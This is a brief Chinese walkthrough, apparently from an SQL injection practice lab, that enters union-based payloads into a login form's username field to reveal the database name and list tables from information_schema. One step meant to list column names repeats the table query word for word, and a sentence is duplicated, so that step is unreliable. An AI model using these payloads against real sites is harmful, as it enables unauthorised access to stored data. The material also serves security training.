- 经过分析可以发现程序对参数进行单引号的处理。
- 在username框中输入1' union select 1,database()# password框中随便输入一个 1
可以发现当前的数据库是security在username框中输入1' union select 1,database()# password框中随便输入一个 1
-
- 在username框中输入1' union select 1,group_concat(table_name) from information_schema.tables where table_schema='security'# password框中随便输入一个 1 来查看表名
- 接下来查看列名 输入1' union select 1,group_concat(table_name) from information_schema.tables where table_schema='security'#
- 接下来我们就可以查看数据了